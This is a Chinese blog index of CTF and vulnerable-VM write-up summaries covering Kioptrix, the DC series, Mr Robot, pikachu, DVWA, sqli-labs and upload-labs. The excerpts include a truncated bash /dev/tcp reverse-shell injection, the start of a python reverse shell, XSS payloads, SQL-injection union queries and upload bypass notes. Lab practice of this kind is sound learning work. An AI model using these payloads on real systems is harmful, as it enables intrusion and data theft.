随笔分类 - 靶场
摘要:# kioprtix level 1.2 存活探测+端口扫描 访问80 同时做一个目录扫描 发现 http://10.0.4.18/phpmyadmin/index.php 指纹识别 cms漏洞查找 测试代码执行,存在漏洞 反弹shell github找到poc git clone https:/
阅读全文
摘要:# kioptrix level-1.1 存活检测 端口扫描 80访问 查看源代码 尝试爆破,先试一下,无结果 尝试万能密码,sql注入 万能密码可以绕过登录 替换数据包进行登录 登录成功 命令执行 反弹shell 127.0.0.1 | bash -i >& /dev/tcp/192.168.2
阅读全文
摘要:# kioptrix 存活探测 端口扫描 服务识别 可测试139 目录扫描 没什么可利用的 139端口渗透 使用msf查询靶机samba版本 msf6 > search smb_version Matching Modules # Name Disclosure Date Rank Check D
阅读全文
摘要:# Myrebot 存活探测 端口扫描 开放80 22 443 访问80 访问页面 是一个命令行界面,输入提示的join,看到如下的界面 习惯性看一下源码,看到这些,应该是wordpress的网站 目录扫描 sudo dirsearch -u http://10.0.4.17 -e * 存在的页面
阅读全文
摘要:DC-7 存活探测 端口扫描 访问80 百度得知入口点 github搜索 ssh登陆 mbox邮件 backup gpg未某种加密方式的文件 backup.sh 更改密码 Drupal 使用Drush是专门服务于drupal的第三方模块。使用drush 来更改admin用户的密码 登录 利用 蚁剑连
阅读全文
摘要:DC-5 存活探测 端口扫描 从80入手 conract提交后,发现日期有变化,并且参数变量可控,猜测文件包含 尝试包含/etc/passwd 从日志文件入手 尝试写入shell 失败了很多次,恢复快照后,ip变了 反弹shell 返回交互式 中途断了一次,换了端口 python反弹 提权(/bin
阅读全文
摘要:DC-4 主机存活探测 扫描 访问80 爆破http http登陆 抓包 可以执行系统命令 尝试反弹shell 返回交互式命令行 另外途径 看到三个用户,可以用来爆破 制作字典 ssh爆破 登陆 var/mail看到charles的密码 切换到charles teehee提权 操作过程如下: 1、e
阅读全文
摘要:DC-3 探测IP 扫描主机 访问80 只有一个flag 扫描目录 whatweb查看 访问后台 搜索joomla漏洞 ##查看 利用sqlmap 库名 表名 字段名 数据 破解admin密码 登陆后台 写入shell 冰蝎连接 命令行反弹shell python -c 'import socket
阅读全文
摘要:DC-2 发现主机 扫描主机 nmap -A -T4 -v -p- 192.168.233.148 访问80 访问不同 hosts文件修改 vim /etc/hosts 再次访问(flag1) 默认后台 制作字典(crew) 密码 用户名 wpscan扫描 wpscan --url http://d
阅读全文
摘要:xss 第一题 <script>alert('xss')</script> <iframe src=javascript:alert('xss')></iframe> <a href=javascript:alert('xss')>ggtest</a> <img src=1 onerror=aler
阅读全文
摘要:命令执行 基础知识 Window “|” 管道符,前面命令标准输出,后面命令的标准输入 “&” commandA & commandB 先运行命令A然后运行命令B “||” commandA || commandB 运行命令A,如果失败则运行命令B “&&” commandA && commandB
阅读全文
摘要:csrf学习记录 pikachu csrf get 来到pikachu页面 这是虚拟机 根据提示vince/123456登陆,看到修改信息 随便填写,bp抓包 因为试get请求,信息都在url里面,可以尝试修改url参数 copy url后,发送给本机打开 这是本机 本机信息情况 get 类型的cs
阅读全文
摘要:#XSS小靶场 <script>alert('hello,gaga!');</script> //经典语句,哈哈! >"'><img src="javascript.:alert('XSS')"> >"'><script>alert('XSS')</script> <table background
阅读全文
摘要:SQL注入 普通注入 字符注入 靶场环境: DVWA SQL注入低 1、输入正常值,返回正常 2、输入1',报错 猜测SQL语句: SELECT first_name, last_name FROM users WHERE user_id = '$id' 3、猜测字段数量 为2时正常,为2时错误 4
阅读全文
摘要:pikachu学习记录(二) 学习来自简简大佬的博客 https://jwt1399.top/posts/30313.html#toc-heading-14 SQL注入 数字型注入POST 字符型注入 搜索型注入 RCE(命令注入) exec "ping" window “|” 管道符,前面命令标准
阅读全文
摘要:pikachu学习记录 学习来自简简大佬的博客 https://jwt1399.top/posts/30313.html#toc-heading-14 暴力破解 基于表单的暴力破解 验证码绕过(on server) 1.验证码设计的太过简单和有规律,容易被猜解 2.验证码校验不严格,逻辑出现问题 3
阅读全文
摘要:upload-labs 第一关 前端JS校验 第二关 content-type校验 第三关 黑名单 .php3 第四关 黑名单 .htaccess绕过 第五关 后缀大小写绕过 第六关 ### 首位去空 第七关 去除文件末尾的点 第八关 缺少::$DATA处理 第九关 路径拼接的是处理后的文件名 点+
阅读全文
摘要:sqlilabs 手工基本操作 报错注入 库: union select 1,group_concat(schema_name) from information_schema.schemata--+ 表: union select 1,group_concat(table_name) from i
阅读全文